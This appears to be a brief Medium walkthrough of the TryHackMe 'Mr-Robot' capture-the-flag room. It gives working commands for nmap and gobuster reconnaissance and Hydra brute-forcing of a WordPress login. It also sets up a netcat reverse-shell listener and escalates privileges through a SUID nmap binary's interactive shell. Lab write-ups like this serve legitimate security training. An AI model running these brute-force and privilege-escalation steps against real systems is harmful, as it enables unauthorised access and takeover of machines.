Mr-Robot — TryHackMe — WriteUp

1/ The first key

nmap -A -T4 -p- vv<ip>

nmap
robots.txt
1st key

2/ The second key

wget -O robotpasswd.txt http://<ip>/fsocity.dic

gobuster dir -u http://<ip> -w /path-to-wordlist

dirbuster
wp-login
Hydra
Burpsuite
Invalid Username

hydra -L robotpasswd.txt -p test <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username” -t 30 -I -f

Hydra got the username
Invalid password

hydra -l Elliot -P robotpasswd.txt <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username” -I -f

Admin Page
Change the IP address

nc -lvnp 1234

reverse shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

robot’s password
robot’s password
2nd key

3/ The final key

find / -perm -u=s -type f 2>/dev/null

find

nmap — interactive

!sh

root shell
final key

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store